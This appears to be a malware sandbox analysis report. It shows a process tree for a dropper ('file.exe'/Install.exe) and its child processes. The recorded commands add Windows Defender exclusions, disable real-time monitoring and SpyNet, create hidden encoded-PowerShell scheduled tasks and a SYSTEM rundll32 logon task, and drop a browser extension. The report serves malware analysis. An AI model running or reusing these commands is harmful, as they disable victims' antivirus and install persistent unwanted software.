description pid Process procid_target PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 1896 wrote to memory of 2016 1896 file.exe 27 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 2016 wrote to memory of 1756 2016 Install.exe 28 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 580 1756 Install.exe 30 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 1756 wrote to memory of 892 1756 Install.exe 32 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 580 wrote to memory of 1792 580 forfiles.exe 34 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 892 wrote to memory of 1924 892 forfiles.exe 35 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1924 wrote to memory of 1724 1924 cmd.exe 36 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1792 wrote to memory of 1556 1792 cmd.exe 37 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1924 wrote to memory of 1824 1924 cmd.exe 38 PID 1792 wrote to memory of 1580 1792 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\7zS668.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zS12C6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1556
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1580
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1724
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1824
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtEkocLde" /SC once /ST 14:10:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtEkocLde"4⤵PID:1260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtEkocLde"4⤵PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bJrbMHMDNUyqMIPThG" /SC once /ST 16:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\HGgTtDq.exe\" FN /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1540
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {642AF04E-788F-49D3-AA8B-49661B35E582} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵PID:688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1764
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:392
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1704
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1804
-
C:\Windows\system32\taskeng.exetaskeng.exe {89AFFA7D-B2B2-42EF-AA42-34EF9347479E} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\HGgTtDq.exeC:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\HGgTtDq.exe FN /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1040 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBroaIuft" /SC once /ST 00:36:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBroaIuft"3⤵PID:1924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBroaIuft"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSfFIerRz" /SC once /ST 04:57:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSfFIerRz"3⤵PID:544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSfFIerRz"3⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:323⤵PID:1548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:643⤵PID:584
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:323⤵PID:1664
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:324⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:643⤵PID:860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:644⤵PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\xKkxXQQPSIyydVpo\skvJaUXm\OGirrkDctGyrOoTQ.wsf"3⤵PID:1616
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\xKkxXQQPSIyydVpo\skvJaUXm\OGirrkDctGyrOoTQ.wsf"3⤵
- Modifies data under HKEY_USERS
PID:316 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:644⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:644⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NTslqXAyKxgJdOVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NTslqXAyKxgJdOVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf" /t REG_DWORD /d 0 /reg:324⤵PID:2032
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf" /t REG_DWORD /d 0 /reg:644⤵PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:324⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:644⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:324⤵PID:1068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:644⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:324⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:644⤵PID:884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:324⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:644⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NTslqXAyKxgJdOVB" /t REG_DWORD /d 0 /reg:324⤵PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NTslqXAyKxgJdOVB" /t REG_DWORD /d 0 /reg:644⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf" /t REG_DWORD /d 0 /reg:324⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:324⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xKkxXQQPSIyydVpo" /t REG_DWORD /d 0 /reg:644⤵PID:1540
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpCENSfnI" /SC once /ST 14:22:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpCENSfnI"3⤵PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpCENSfnI"3⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:864
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1544
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1996
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FFlCdDCQpdthnDzXV" /SC once /ST 03:48:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\kPdeNMl.exe\" PY /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FFlCdDCQpdthnDzXV"3⤵PID:568
-
-
-
C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\kPdeNMl.exeC:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\kPdeNMl.exe PY /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bJrbMHMDNUyqMIPThG"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1596
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1540
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jPDVFKipU\KEEtGf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SXVvvXCuCecgohx" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SXVvvXCuCecgohx2" /F /xml "C:\Program Files (x86)\jPDVFKipU\MLGLlYq.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
